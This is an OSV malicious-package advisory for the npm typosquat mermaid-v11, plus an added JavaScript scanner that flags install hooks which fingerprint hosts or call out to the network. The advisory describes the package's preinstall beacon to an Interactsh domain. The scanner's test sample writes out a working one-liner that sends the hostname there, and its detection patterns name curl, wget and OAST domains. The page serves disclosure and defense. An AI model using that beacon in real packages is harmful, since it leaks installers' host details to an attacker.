MAL-2026-5539

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mermaid-v11/MAL-2026-5539.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5539
Published
2026-06-11T00:41:50Z
Modified
2026-06-11T02:31:31.358920593Z
Summary
Malicious code in mermaid-v11 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (416d5c5ab1bc70076021520f20e67c3c52a81b74832379e19012fa2f6526c469)

The package impersonates the legitimate mermaid diagramming library (name mermaid-v11, bogus version 9999.0.2, description 'Mermaid v11 diagramming library') and ships no library code — only a malicious preinstall lifecycle hook. On npm install, package.json line 6 runs node -e that reads require('os').hostname() and the OS username and beacons them out-of-band to an attacker-controlled Interactsh endpoint via two channels: an HTTPS GET to https://d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me/?h=<hostname>&u=<username>&pkg=mermaid-v11, and a DNS lookup of mermaid-v11.<hostname>.d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me to leak the hostname through the resolver chain. The behavior fires automatically on default install with no user interaction, harvesting installer host identifiers for an attacker-controlled OAST listener.

Source: ossf-package-analysis (003edde2881c4b52d0a0ae821b81083c569fc8bf9ef236a216c82054e2cb3b4f)

The OpenSSF Package Analysis project identified 'mermaid-v11' @ 9999.0.2 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.
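The Amazon Inspector entry above describes the whole compromise as a single `preinstall` lifecycle script that fingerprints the installing host and beacons out over HTTPS and DNS. That shape is easy to catch before `npm install` ever runs the hook. The following is an added example written for this page; it is not code from the OSV record, from OpenSSF Package Analysis, from Amazon Inspector, or from the package itself. The hook list, the indicator regexes, the version heuristic and both sample manifests are constructed for illustration; the only page data reused is the callback domain from the record's `indicators.domains` list. The manifest text is only inspected, never executed.

```javascript
// Added example (not from the OSV record or from the mermaid-v11 package): a
// static audit of an npm package.json for install-time lifecycle scripts that
// fingerprint the host or reach the network, the pattern described in the
// Amazon Inspector write-up above. Scripts are inspected as text, never run.

// Lifecycle scripts npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators, constructed for this example: [label, pattern].
const INDICATORS = [
  ["inline-node", /\bnode\s+(-e|--eval)\b/],                 // node -e "<code>"
  ["host-fingerprint", /\b(hostname|userInfo)\s*\(/],        // os.hostname(), os.userInfo()
  ["env-user", /\b(USERNAME|USER|HOME|LOGNAME)\b/],          // username via environment
  ["http-client", /require\(['"]https?['"]\)|\bfetch\s*\(|\bcurl\b|\bwget\b|https?:\/\//],
  ["dns-lookup", /require\(['"]dns['"]\)|\bdns\.(lookup|resolve)/],
  ["oast-domain", /\.(oast\.(me|fun|pro|live|site|online)|interact\.sh)\b/i], // Interactsh defaults
];

// Callback domain taken from the record's indicators.domains list above.
const KNOWN_IOC_DOMAINS = ["d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me"];

// A version like 9999.0.2 is a typosquat tell: the real library has no
// four-digit major. The threshold is a constructed heuristic.
function implausibleVersion(version) {
  const major = parseInt(String(version || "").split(".")[0], 10);
  return Number.isFinite(major) && major >= 1000;
}

function auditPackageJson(text) {
  let pkg;
  try {
    pkg = JSON.parse(text);
  } catch (e) {
    // An unparseable manifest is itself worth a human look.
    return { error: "invalid JSON: " + e.message, findings: [], verdict: "review" };
  }
  const scripts = pkg && typeof pkg.scripts === "object" && pkg.scripts ? pkg.scripts : {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const indicators = INDICATORS.filter(([, re]) => re.test(cmd)).map(([label]) => label);
    const iocDomains = KNOWN_IOC_DOMAINS.filter((d) => cmd.includes(d));
    if (iocDomains.length) indicators.push("known-ioc-domain");
    if (indicators.length) findings.push({ hook, indicators, iocDomains });
  }
  // Any install hook that reaches the network (or names a known callback
  // domain) is blocked; other hook oddities go to review; nothing found is ok.
  const NETWORK = new Set(["http-client", "dns-lookup", "oast-domain", "known-ioc-domain"]);
  const exfilLike = findings.some((f) => f.indicators.some((i) => NETWORK.has(i)));
  const verdict = exfilLike ? "block" : findings.length ? "review" : "ok";
  return {
    name: pkg && pkg.name,
    version: pkg && pkg.version,
    implausibleVersion: implausibleVersion(pkg && pkg.version),
    findings,
    verdict,
  };
}

// Constructed samples. The first mirrors the manifest the write-up describes
// (metadata plus a preinstall hook, no library code); the second is a benign
// package that also uses a lifecycle hook, to show not every postinstall fires.
const SUSPICIOUS_SAMPLE = JSON.stringify({
  name: "mermaid-v11",
  version: "9999.0.2",
  description: "Mermaid v11 diagramming library",
  scripts: {
    preinstall:
      "node -e \"const o=require('os');require('https').get('https://d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me/?h='+o.hostname())\"",
  },
});

const BENIGN_SAMPLE = JSON.stringify({
  name: "example-lib",
  version: "1.4.2",
  scripts: { build: "tsc -p .", postinstall: "node scripts/print-notice.js" },
});

if (typeof require !== "undefined" && require.main === module) {
  for (const sample of [SUSPICIOUS_SAMPLE, BENIGN_SAMPLE]) {
    console.log(JSON.stringify(auditPackageJson(sample), null, 2));
  }
}
```

Run it against the extracted `package.json` of any tarball before installation (for example in a registry proxy or a pre-merge dependency check). The verdict logic deliberately treats the network indicators as the decisive ones: a hook that merely calls `node -e` gets a human review, while a hook that both fingerprints the host and talks to an external endpoint, as this package's did, is blocked outright. Pairing the audit with `npm install --ignore-scripts` for untrusted packages closes the remaining gap, since the hook then never runs even if the heuristics miss it.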
Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "9999.0.2"
            ],
            "sha256": "003edde2881c4b52d0a0ae821b81083c569fc8bf9ef236a216c82054e2cb3b4f",
            "source": "ossf-package-analysis",
            "modified_time": "2026-06-11T00:56:11Z",
            "import_time": "2026-06-11T01:21:48.587989408Z"
        },
        {
            "import_time": "2026-06-11T01:21:48.528302812Z",
            "sha256": "e09f1e6e06b756c14d4bf0c26e54a82093ee00a8b8190974088973cb664aada7",
            "source": "ossf-package-analysis",
            "modified_time": "2026-06-11T00:41:50Z",
            "versions": [
                "9999.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-005359",
            "import_time": "2026-06-11T02:24:27.684217154Z",
            "sha256": "334e4086eca8d2c76ec7ba03c6e47af121ed5ef043b0e4bf30db86248d064467",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T01:46:53Z",
            "versions": [
                "9999.0.2"
            ]
        },
        {
            "id": "IN-MAL-2026-005358",
            "import_time": "2026-06-11T02:24:27.62799726Z",
            "sha256": "416d5c5ab1bc70076021520f20e67c3c52a81b74832379e19012fa2f6526c469",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T01:46:52Z",
            "versions": [
                "9999.0.2"
            ]
        },
        {
            "id": "IN-MAL-2026-005360",
            "import_time": "2026-06-11T02:24:27.762128916Z",
            "sha256": "5ef3e485f7b13c78c745d0e7165199eacb142cb62da22b44eaa51460474f10b9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T01:46:58Z",
            "versions": [
                "9999.0.1"
            ]
        },
        {
            "id": "IN-MAL-2026-005364",
            "import_time": "2026-06-11T02:24:27.969639096Z",
            "sha256": "c3188d09fdd69443609241a8e3baac0c120837170b801b7eaa7ad2c0f5b5808a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T01:48:16Z",
            "versions": [
                "9999.0.0"
            ]
        },
        {
            "id": "IN-MAL-2026-005361",
            "versions": [
                "9999.0.1"
            ],
            "sha256": "e00db32b40228301a09dc2a6245bca93536d909e4e8e5b8c1d207586337947df",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T01:46:58Z",
            "import_time": "2026-06-11T02:24:27.80392393Z"
        },
        {
            "id": "IN-MAL-2026-005365",
            "versions": [
                "9999.0.0"
            ],
            "sha256": "ed2c7d1b0095d1d538c4302304b30a940efd8cb6c0de4ae28e09f76ef7de6a25",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T01:48:16Z",
            "import_time": "2026-06-11T02:24:28.026904512Z"
        }
    ]
}
References
Credits

Affected packages

npm / mermaid-v11

Package

Affected ranges

Affected versions

9999.*
9999.0.0
9999.0.1
9999.0.2

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "e4d3d429ed4dda6b54024546edbbc51916777528ad52c4b8504b74884c5bc82f",
            "tlsh": "b4f0d4fd0b10f6230ed90271429e720da5d2ea03754c9811c9e703ca47697f3bd75036"
        }
    ],
    "package_integrity": [
        {
            "filename": "mermaid-v11-9999.0.2.tgz",
            "hashes": {
                "sha512_sri": "sha512-hxuwqfGRTWtEAl0buMUz4BmUZaIisJTmMu/SAS2gzV+oALV5LGfWD2escRKjfWaGkPQA3tNePgUWMq4IUwFddg==",
                "sha1": "48b784b0037181a17d7ed2fe08f214a2006220eb"
            }
        }
    ],
    "domains": [
        "d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me",
        "mermaid-v11.scan-2579d3f17b08.d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mermaid-v11/MAL-2026-5539.json"